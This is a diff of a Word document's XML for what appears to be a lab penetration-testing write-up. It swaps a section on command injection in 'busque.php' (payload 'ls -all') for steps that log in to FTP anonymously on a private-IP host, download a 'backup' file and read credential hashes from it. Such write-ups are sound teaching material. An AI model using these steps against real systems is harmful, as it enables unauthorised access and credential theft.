-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>80 (HTTP)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> during the Nmap scan, the web server was accessed through a browser.</w:t>
+        <w:t>The FTP service was tested to check whether anonymous login was allowed.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Command:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6260,7 +6336,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>http://172.20.10.3</w:t>
+        <w:t>ftp 172.20.10.2</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6280,27 +6356,140 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve">The page displayed an </w:t>
-      </w:r>
-      <w:r>
+        <w:t>Anonymous login was successful.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28A7F50B" wp14:editId="725997B5">
+            <wp:extent cx="5731510" cy="3001645"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
+            <wp:docPr id="234193362" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="234193362" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="3001645"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Apache directory listing</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>, revealing a directory named:</w:t>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Exploring FTP Files</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>After logging into FTP, the directory contents were listed.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Command:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6346,7 +6535,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>site</w:t>
+        <w:t>ls</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6362,119 +6551,11 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:noProof/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46E612C3" wp14:editId="4E214016">
-            <wp:extent cx="5731510" cy="3000375"/>
-            <wp:effectExtent l="19050" t="19050" r="21590" b="28575"/>
-            <wp:docPr id="893401913" name="Picture 32"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="893401913" name="Picture 893401913"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId12" cstate="print">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="3000375"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:ln>
-                      <a:solidFill>
-                        <a:prstClr val="black"/>
-                      </a:solidFill>
-                    </a:ln>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Exploring the Web Application</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Navigating to the discovered directory:</w:t>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>A file named:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6520,7 +6601,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>http://172.20.10.3/site</w:t>
+        <w:t>backup</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6540,27 +6621,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve">revealed a simple website built using a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Bootstrap template</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>was discovered.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6575,16 +6636,14 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:noProof/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-        </w:rPr>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CABFFD3" wp14:editId="50FA737F">
-            <wp:extent cx="5731510" cy="3000375"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
-            <wp:docPr id="136527466" name="Picture 33"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51007D02" wp14:editId="1AC89BA2">
+            <wp:extent cx="5000000" cy="3647619"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="2032886848" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -6592,17 +6651,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="136527466" name="Picture 136527466"/>
+                    <pic:cNvPr id="2032886848" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13" cstate="print">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
+                    <a:blip r:embed="rId13"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6610,7 +6663,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="3000375"/>
+                      <a:ext cx="5000000" cy="3647619"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -6662,8 +6715,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Command Injection Vulnerability</w:t>
+        <w:t>Downloading the Backup File</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6683,7 +6735,27 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Within the web application, a file named:</w:t>
+        <w:t>The file was downloaded using the FTP client.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Command:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6729,7 +6801,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>busque.php</w:t>
+        <w:t>get backup</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6749,7 +6821,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>contained a search functionality.</w:t>
+        <w:t>The transfer was completed successfully.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6764,32 +6836,126 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Testing the input parameter revealed that user input was not properly sanitized.</w:t>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51B6A6CD" wp14:editId="6729F284">
+            <wp:extent cx="5266667" cy="5019048"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="594838691" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="594838691" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5266667" cy="5019048"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Example payload used:</w:t>
+        <w:outlineLvl w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Extracting Credentials</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>The downloaded file was opened locally.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Command:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6835,7 +7001,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>ls -all</w:t>
+        <w:t>cat backup</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6855,27 +7021,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve">The application returned the server directory listing, confirming that </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>system commands were being executed on the server</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>The file contained several encrypted credentials including hashes for different services.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6895,175 +7041,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve">This indicated a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>command injection vulnerability</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:noProof/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6396DDB4" wp14:editId="173114DF">
-            <wp:extent cx="5731510" cy="3000375"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
-            <wp:docPr id="1426562390" name="Picture 34"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1426562390" name="Picture 1426562390"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
